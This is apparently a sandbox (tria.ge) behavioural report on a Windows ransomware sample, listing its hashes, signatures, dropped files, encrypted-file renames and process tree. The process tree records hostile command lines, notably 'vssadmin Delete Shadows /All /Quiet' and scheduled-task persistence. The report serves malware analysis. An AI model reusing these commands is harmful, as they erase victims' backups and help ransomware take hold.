Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
131s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
04/05/2022, 19:29
Static task
static1
Behavioral task
behavioral1
Sample
sample.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
sample.exe
Resource
win10v2004-20220414-en
General
-
Target
sample.exe
-
Size
1.1MB
-
MD5
a56644a519d6fce5f20a744ae3820af2
-
SHA1
93acd978da4a602c9ea1a23b6a97d74ced436e56
-
SHA256
563daaab9f9d7be02f037c540d561c424aa3e5efc6a9a5c8d58858d98e2aae3c
-
SHA512
5ee5ae6d10bb4c3290664454666bd5f82d694bb772d9d5e6dc9e29cb7129cf696ac5b694676eb78074e4196a459e66f6b34b920017af1cd2addb35a1e1b85416
Malware Config
Extracted
C:\Read_Me!_.txt
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 2 IoCs
pid Process 384 Process not Found 844 Desktopini.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\RenameRestart.tiff sample.exe -
Deletes itself 1 IoCs
pid Process 844 Desktopini.exe -
Drops startup file 6 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt sample.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe Desktopini.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe sample.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt sample.exe -
Loads dropped DLL 11 IoCs
pid Process 1400 Process not Found 1400 Process not Found 384 Process not Found 1400 Process not Found 1400 Process not Found 1400 Process not Found 1400 Process not Found 1400 Process not Found 1400 Process not Found 1400 Process not Found 1400 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 208.67.222.222 Destination IP 208.67.222.222 Destination IP 208.67.222.222 -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini sample.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini sample.exe File opened for modification C:\Users\Admin\Music\desktop.ini sample.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini sample.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini sample.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-1819626980-2277161760-1023733287-1000\desktop.ini Desktopini.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\PWZ8QZ9F\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D396AG1W\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini sample.exe File opened for modification C:\Users\Public\Desktop\desktop.ini sample.exe File opened for modification C:\Users\Public\Music\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini sample.exe File opened for modification C:\Users\Public\desktop.ini sample.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Ringtones\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini sample.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini sample.exe File opened for modification C:\Users\Public\Videos\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\N4DR1BTE\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini sample.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VRG14UW3\desktop.ini sample.exe File opened for modification C:\Users\Public\Documents\desktop.ini sample.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini sample.exe File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini sample.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini sample.exe File opened for modification C:\Users\Admin\Videos\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I7JGZPUA\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini sample.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini sample.exe File opened for modification C:\Users\Admin\Documents\desktop.ini sample.exe File opened for modification C:\Users\Admin\Links\desktop.ini sample.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini sample.exe File opened for modification C:\Users\Admin\Searches\desktop.ini sample.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\P4R98AUH\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini sample.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini sample.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini sample.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini sample.exe File opened for modification C:\Program Files (x86)\desktop.ini sample.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\8WU7A3BP\desktop.ini sample.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: sample.exe File opened (read-only) \??\G: sample.exe File opened (read-only) \??\J: sample.exe File opened (read-only) \??\M: sample.exe File opened (read-only) \??\P: sample.exe File opened (read-only) \??\Q: sample.exe File opened (read-only) \??\U: sample.exe File opened (read-only) \??\X: sample.exe File opened (read-only) \??\E: sample.exe File opened (read-only) \??\F: sample.exe File opened (read-only) \??\K: sample.exe File opened (read-only) \??\R: sample.exe File opened (read-only) \??\S: sample.exe File opened (read-only) \??\T: sample.exe File opened (read-only) \??\A: sample.exe File opened (read-only) \??\N: sample.exe File opened (read-only) \??\V: sample.exe File opened (read-only) \??\W: sample.exe File opened (read-only) \??\B: sample.exe File opened (read-only) \??\H: sample.exe File opened (read-only) \??\I: sample.exe File opened (read-only) \??\L: sample.exe File opened (read-only) \??\O: sample.exe File opened (read-only) \??\Y: sample.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00095_.WMF[[email protected]].CCBG sample.exe File opened for modification C:\Program Files\Common Files\System\msadc\msaddsr.dll sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105710.WMF sample.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo[[email protected]].CCBG sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00612_.WMF sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_K_COL.HXK sample.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\settings.js sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\service.js sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\HEADER.GIF[[email protected]].CCBG sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01126_.WMF sample.exe File opened for modification C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.CRT sample.exe File opened for modification \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_ButtonGraphic.png sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\CASHREG.WAV sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0144773.JPG[[email protected]].CCBG sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\settings.css sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\MedianFax.Dotx sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png sample.exe File created C:\Program Files\Microsoft Games\Chess\it-IT\Read_Me!_.txt sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\FPERSON.DLL sample.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf[[email protected]].CCBG sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\Read_Me!_.txt sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_down.png sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT[[email protected]].CCBG sample.exe File opened for modification \??\c:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\msvcr100.dll sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02794_.WMF sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\css\Read_Me!_.txt sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png sample.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\FreeCell.exe sample.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\clock.js sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Contacts.accdt[[email protected]].CCBG sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPrintTemplate.html[[email protected]].CCBG sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue.css sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14996_.GIF[[email protected]].CCBG sample.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\weather.css sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\localizedStrings.js sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_SlateBlue.gif[[email protected]].CCBG sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSYUBIN7.DLL sample.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter_partly-cloudy.png sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar[[email protected]].CCBG sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\css\Read_Me!_.txt sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_LightSpirit.gif[[email protected]].CCBG sample.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\JOURNAL\Read_Me!_.txt sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTO\vstoee90.tlb sample.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\msdasc.dll sample.exe File created C:\Program Files (x86)\Google\Update\Install\Read_Me!_.txt sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00234_.WMF sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\settings.html sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\mshwLatin.dll.mui sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL097.XML[[email protected]].CCBG sample.exe File opened for modification \??\c:\Program Files\Windows Journal\MSPVWCTL.DLL sample.exe File opened for modification \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\js\calendar.js sample.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Excel.en-us\Read_Me!_.txt sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_F_COL.HXK[[email protected]].CCBG sample.exe File opened for modification \??\c:\Program Files\Common Files\Microsoft Shared\ink\es-ES\InkObj.dll.mui sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\Read_Me!_.txt sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21312_.GIF[[email protected]].CCBG sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Singapore sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03331_.WMF sample.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Pagesfilo.sys sample.exe File opened for modification C:\Windows\Pagesfilo.sys sample.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1968 schtasks.exe 1756 schtasks.exe -
Delays execution with timeout.exe 7 IoCs
pid Process 1128 timeout.exe 1660 timeout.exe 608 timeout.exe 1044 timeout.exe 1068 timeout.exe 472 timeout.exe 388 timeout.exe -
Enumerates processes with tasklist 1 TTPs 9 IoCs
pid Process 1144 tasklist.exe 536 tasklist.exe 1200 tasklist.exe 1964 tasklist.exe 2044 tasklist.exe 828 tasklist.exe 1332 tasklist.exe 1740 tasklist.exe 1044 tasklist.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
pid Process 1872 systeminfo.exe 1744 systeminfo.exe -
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1636 vssadmin.exe 1432 vssadmin.exe 1964 vssadmin.exe -
Kills process with taskkill 64 IoCs
pid Process 396 taskkill.exe 752 taskkill.exe 544 taskkill.exe 856 taskkill.exe 1980 taskkill.exe 1636 taskkill.exe 884 taskkill.exe 856 taskkill.exe 1980 taskkill.exe 432 taskkill.exe 1944 taskkill.exe 1052 taskkill.exe 320 taskkill.exe 1388 taskkill.exe 1268 taskkill.exe 1972 taskkill.exe 1388 taskkill.exe 608 taskkill.exe 1064 taskkill.exe 608 taskkill.exe 1636 taskkill.exe 820 taskkill.exe 1276 taskkill.exe 1740 taskkill.exe 856 taskkill.exe 1956 taskkill.exe 1792 taskkill.exe 2004 taskkill.exe 884 taskkill.exe 1352 taskkill.exe 524 taskkill.exe 2004 taskkill.exe 960 taskkill.exe 1776 taskkill.exe 1124 taskkill.exe 884 taskkill.exe 2008 taskkill.exe 1176 taskkill.exe 1180 taskkill.exe 1792 taskkill.exe 1364 taskkill.exe 960 taskkill.exe 2044 taskkill.exe 1196 taskkill.exe 1900 taskkill.exe 1792 taskkill.exe 1196 taskkill.exe 1972 taskkill.exe 1636 taskkill.exe 960 taskkill.exe 1956 taskkill.exe 1268 taskkill.exe 844 taskkill.exe 980 taskkill.exe 1364 taskkill.exe 1956 taskkill.exe 1948 taskkill.exe 2044 taskkill.exe 1388 taskkill.exe 652 taskkill.exe 608 taskkill.exe 1052 taskkill.exe 1980 taskkill.exe 1488 taskkill.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 1992 reg.exe 764 reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2044 tasklist.exe 2044 tasklist.exe 1144 tasklist.exe 1144 tasklist.exe 1740 tasklist.exe 1740 tasklist.exe 1044 tasklist.exe 1044 tasklist.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2044 tasklist.exe Token: SeDebugPrivilege 1144 tasklist.exe Token: SeBackupPrivilege 1096 vssvc.exe Token: SeRestorePrivilege 1096 vssvc.exe Token: SeAuditPrivilege 1096 vssvc.exe Token: SeIncreaseQuotaPrivilege 1128 WMIC.exe Token: SeSecurityPrivilege 1128 WMIC.exe Token: SeTakeOwnershipPrivilege 1128 WMIC.exe Token: SeLoadDriverPrivilege 1128 WMIC.exe Token: SeSystemProfilePrivilege 1128 WMIC.exe Token: SeSystemtimePrivilege 1128 WMIC.exe Token: SeProfSingleProcessPrivilege 1128 WMIC.exe Token: SeIncBasePriorityPrivilege 1128 WMIC.exe Token: SeCreatePagefilePrivilege 1128 WMIC.exe Token: SeBackupPrivilege 1128 WMIC.exe Token: SeRestorePrivilege 1128 WMIC.exe Token: SeShutdownPrivilege 1128 WMIC.exe Token: SeDebugPrivilege 1128 WMIC.exe Token: SeSystemEnvironmentPrivilege 1128 WMIC.exe Token: SeRemoteShutdownPrivilege 1128 WMIC.exe Token: SeUndockPrivilege 1128 WMIC.exe Token: SeManageVolumePrivilege 1128 WMIC.exe Token: 33 1128 WMIC.exe Token: 34 1128 WMIC.exe Token: 35 1128 WMIC.exe Token: SeIncreaseQuotaPrivilege 1128 WMIC.exe Token: SeSecurityPrivilege 1128 WMIC.exe Token: SeTakeOwnershipPrivilege 1128 WMIC.exe Token: SeLoadDriverPrivilege 1128 WMIC.exe Token: SeSystemProfilePrivilege 1128 WMIC.exe Token: SeSystemtimePrivilege 1128 WMIC.exe Token: SeProfSingleProcessPrivilege 1128 WMIC.exe Token: SeIncBasePriorityPrivilege 1128 WMIC.exe Token: SeCreatePagefilePrivilege 1128 WMIC.exe Token: SeBackupPrivilege 1128 WMIC.exe Token: SeRestorePrivilege 1128 WMIC.exe Token: SeShutdownPrivilege 1128 WMIC.exe Token: SeDebugPrivilege 1128 WMIC.exe Token: SeSystemEnvironmentPrivilege 1128 WMIC.exe Token: SeRemoteShutdownPrivilege 1128 WMIC.exe Token: SeUndockPrivilege 1128 WMIC.exe Token: SeManageVolumePrivilege 1128 WMIC.exe Token: 33 1128 WMIC.exe Token: 34 1128 WMIC.exe Token: 35 1128 WMIC.exe Token: SeDebugPrivilege 1636 taskkill.exe Token: SeDebugPrivilege 432 taskkill.exe Token: SeDebugPrivilege 2044 taskkill.exe Token: SeDebugPrivilege 884 taskkill.exe Token: SeDebugPrivilege 1196 taskkill.exe Token: SeDebugPrivilege 1352 taskkill.exe Token: SeDebugPrivilege 2012 taskkill.exe Token: SeDebugPrivilege 1972 taskkill.exe Token: SeDebugPrivilege 1696 taskkill.exe Token: SeDebugPrivilege 1948 taskkill.exe Token: SeDebugPrivilege 396 taskkill.exe Token: SeDebugPrivilege 652 taskkill.exe Token: SeDebugPrivilege 820 taskkill.exe Token: SeDebugPrivilege 1268 taskkill.exe Token: SeDebugPrivilege 1900 taskkill.exe Token: SeDebugPrivilege 1052 taskkill.exe Token: SeDebugPrivilege 388 taskkill.exe Token: SeDebugPrivilege 844 taskkill.exe Token: SeDebugPrivilege 1124 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1336 wrote to memory of 884 1336 sample.exe 28 PID 1336 wrote to memory of 884 1336 sample.exe 28 PID 1336 wrote to memory of 884 1336 sample.exe 28 PID 1336 wrote to memory of 884 1336 sample.exe 28 PID 884 wrote to memory of 2044 884 cmd.exe 29 PID 884 wrote to memory of 2044 884 cmd.exe 29 PID 884 wrote to memory of 2044 884 cmd.exe 29 PID 884 wrote to memory of 2044 884 cmd.exe 29 PID 884 wrote to memory of 1912 884 cmd.exe 30 PID 884 wrote to memory of 1912 884 cmd.exe 30 PID 884 wrote to memory of 1912 884 cmd.exe 30 PID 884 wrote to memory of 1912 884 cmd.exe 30 PID 1336 wrote to memory of 1812 1336 sample.exe 32 PID 1336 wrote to memory of 1812 1336 sample.exe 32 PID 1336 wrote to memory of 1812 1336 sample.exe 32 PID 1336 wrote to memory of 1812 1336 sample.exe 32 PID 1336 wrote to memory of 388 1336 sample.exe 33 PID 1336 wrote to memory of 388 1336 sample.exe 33 PID 1336 wrote to memory of 388 1336 sample.exe 33 PID 1336 wrote to memory of 388 1336 sample.exe 33 PID 388 wrote to memory of 1356 388 cmd.exe 34 PID 388 wrote to memory of 1356 388 cmd.exe 34 PID 388 wrote to memory of 1356 388 cmd.exe 34 PID 388 wrote to memory of 1356 388 cmd.exe 34 PID 1336 wrote to memory of 1700 1336 sample.exe 35 PID 1336 wrote to memory of 1700 1336 sample.exe 35 PID 1336 wrote to memory of 1700 1336 sample.exe 35 PID 1336 wrote to memory of 1700 1336 sample.exe 35 PID 1700 wrote to memory of 1756 1700 cmd.exe 36 PID 1700 wrote to memory of 1756 1700 cmd.exe 36 PID 1700 wrote to memory of 1756 1700 cmd.exe 36 PID 1700 wrote to memory of 1756 1700 cmd.exe 36 PID 1356 wrote to memory of 616 1356 WScript.exe 37 PID 1356 wrote to memory of 616 1356 WScript.exe 37 PID 1356 wrote to memory of 616 1356 WScript.exe 37 PID 1356 wrote to memory of 616 1356 WScript.exe 37 PID 1356 wrote to memory of 112 1356 WScript.exe 39 PID 1356 wrote to memory of 112 1356 WScript.exe 39 PID 1356 wrote to memory of 112 1356 WScript.exe 39 PID 1356 wrote to memory of 112 1356 WScript.exe 39 PID 112 wrote to memory of 1144 112 cmd.exe 41 PID 112 wrote to memory of 1144 112 cmd.exe 41 PID 112 wrote to memory of 1144 112 cmd.exe 41 PID 112 wrote to memory of 1144 112 cmd.exe 41 PID 112 wrote to memory of 1948 112 cmd.exe 42 PID 112 wrote to memory of 1948 112 cmd.exe 42 PID 112 wrote to memory of 1948 112 cmd.exe 42 PID 112 wrote to memory of 1948 112 cmd.exe 42 PID 1336 wrote to memory of 1712 1336 sample.exe 43 PID 1336 wrote to memory of 1712 1336 sample.exe 43 PID 1336 wrote to memory of 1712 1336 sample.exe 43 PID 1336 wrote to memory of 1712 1336 sample.exe 43 PID 112 wrote to memory of 1636 112 cmd.exe 44 PID 112 wrote to memory of 1636 112 cmd.exe 44 PID 112 wrote to memory of 1636 112 cmd.exe 44 PID 112 wrote to memory of 1636 112 cmd.exe 44 PID 1336 wrote to memory of 1332 1336 sample.exe 45 PID 1336 wrote to memory of 1332 1336 sample.exe 45 PID 1336 wrote to memory of 1332 1336 sample.exe 45 PID 1336 wrote to memory of 1332 1336 sample.exe 45 PID 1332 wrote to memory of 1872 1332 cmd.exe 47 PID 1332 wrote to memory of 1872 1332 cmd.exe 47 PID 1332 wrote to memory of 1872 1332 cmd.exe 47 PID 1332 wrote to memory of 1872 1332 cmd.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample.exe"C:\Users\Admin\AppData\Local\Temp\sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵PID:1812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat2⤵
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat4⤵PID:616
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵PID:1948
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
PID:1636
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:472
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:536
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:1556
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:388
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1200
-
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵PID:1204
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1128
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:828
-
-
